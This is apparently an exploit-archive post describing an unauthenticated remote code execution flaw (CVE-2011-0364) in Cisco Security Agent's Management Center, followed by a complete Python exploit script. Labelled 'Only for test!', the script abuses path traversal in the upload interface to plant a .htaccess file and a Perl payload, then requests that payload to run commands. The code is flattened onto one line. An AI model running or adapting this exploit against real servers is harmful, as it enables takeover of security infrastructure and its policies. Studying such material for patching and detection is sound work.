Cisco Security Agent provides threat protection for server and desktop computing systems. Cisco Security Agent can function in a standalone manner or can be managed by the Management Center for Cisco Security Agent.
The Management Center for Cisco Security Agent is affected by a vulnerability that could allow an unauthenticated attacker to perform remote code execution on the affected device. A successful exploit could allow the attacker to modify agent policies and system configuration and perform other administrative tasks.
Note: This vulnerability can be exploited only by sending certain packets to the web management interface, which by default listens on TCP port 443.
Cisco Security Agent software releases 5.1, 5.2, and 6.0 are affected by this vulnerability.
Below the source of the exploit (Only for test!).
#!/usr/bin/env python # Exploits Cisco Security Agent Management Console ‘st_upload’ (CVE-2011-0364) # gerry eisenhaur */ // -->> import httplib import mimetools import StringIO _boundary = mimetools.choose_boundary() _host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB' _csamc = "192.168.0.108" # we need to enable some scripting to get command access htaccess = "Options +Includes +ExecCGI\r\nAddHandler cgi-script gee" perl_path = "#!c:/program files/cisco/csamc/csamc60/perl/5.8.7/bin/mswin32-x86/perl\r\n", backdoor = "exec \"calc.exe\";" def send_request(params=None): buf = StringIO.StringIO() headers = {"Content-type": 'multipart/form-data; boundary=%s' % _boundary} for(key, value) in params.iteritems(): buf.write('--%s\r\n' % _boundary) buf.write('Content-Disposition: form-data; name="%s"' % key) buf.write('\r\n\r\n%s\r\n' % value) buf.write('--' + _boundary + '--\r\n\r\n') body = buf.getvalue() conn = httplib.HTTPSConnection(_csamc) conn.request("POST", "/csamc60/agent", body, headers) response = conn.getresponse() print response.status, response.reason conn.close() def main(): ### Build up required dir tree dirtree = ["../bin/webserver/htdocs/diag/bin", "../bin/webserver/htdocs/diag/bin/webserver", "../bin/webserver/htdocs/diag/bin/webserver/htdocs"] _params = { 'host_uid': _host_uid, 'jobname': None, 'host': "aa", 'diags': " ", 'diagsu': " ", 'profiler': " ", 'extension': "gee", } for path in dirtree: print "[+] Creating directory: %s" % path _params['jobname'] = path send_request(_params) ### Done building path, drop files print "[+] Dropping .htaccess" send_request({ 'host_uid': _host_uid, 'jobname': '', 'host': "/../bin/webserver/", 'diags': "", 'diagsu': "", 'profiler': htaccess, 'extension': "/../.htaccess", }) print "[+] Dropping payload" send_request({ 'host_uid': _host_uid, 'jobname': '', 'host': "/../bin/webserver/htdocs/gerry", 'diags': perl_path, 'diagsu': "", 'profiler': backdoor, 'extension': "/../exploit.gee", }) print "[+] Done, Executing dropped file." try: conn = httplib.HTTPSConnection(_csamc, timeout=1) conn.request("GET", "/csamc60/exploit.gee") response = conn.getresponse() print response.status, response.reason print response.read() except httplib.ssl.SSLError: pass print "[+] Finished." if __name__ == '__main__': main()
References: